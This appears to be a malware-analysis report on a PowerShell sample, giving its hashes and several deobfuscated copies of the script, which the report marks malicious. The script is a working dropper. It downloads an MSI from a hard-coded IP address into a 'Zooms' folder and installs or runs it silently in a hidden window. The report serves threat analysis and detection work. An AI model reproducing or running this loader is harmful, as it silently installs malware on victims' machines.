5d1208ad479e0b72ad2eebf849bee0d4
PowerShell | MD5: 5d1208ad479e0b72ad2eebf849bee0d4 | Size: 1.62 KB | application/x-powershell
|
Hash | Hash Value |
|---|---|
| MD5 | 5d1208ad479e0b72ad2eebf849bee0d4
|
| Sha1 | 912138d93e657bb9d3c69cf2764cc809ee6cd730
|
| Sha256 | f3cc95f13557763ff23c2b7537a1708f0bb37ba4dcad7107debd9a911dbfe268
|
| Sha384 | 067e3f1932afa86fc010ed853add611256c77d39a3cfab4347ab304fbf4003acb8ffed9186628364cf4b26d2a184d7eb
|
| Sha512 | e66019d8384a0119167c8c447be675036ce740f508fa268a81f591f409f615b86aaaed20ff2e82221e5bc409a43653d7cd011b77906909bbab939b6ae0f931f2
|
| SSDeep | 48:lkLzqRowIX6nVxVYyeMDra37vOPmfqHX4AfMHt:Qz8owIX6VxbDrarGPmSHVfMHt
|
| TLSH | D03191912BE91204F2F77F457E7E84684A3B3C25DE31CB4C42A5194E06F2E60C866F7A
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i "$filePath" /qn /norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath /qn /norestart -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i "$filePath" /qn /norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } Malicious |
5d1208ad479e0b72ad2eebf849bee0d4 |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath /qn /norestart -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } Malicious |
5d1208ad479e0b72ad2eebf849bee0d4 > [Deobfuscated PS] |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } Malicious |
5d1208ad479e0b72ad2eebf849bee0d4 > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } Malicious |
5d1208ad479e0b72ad2eebf849bee0d4 > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |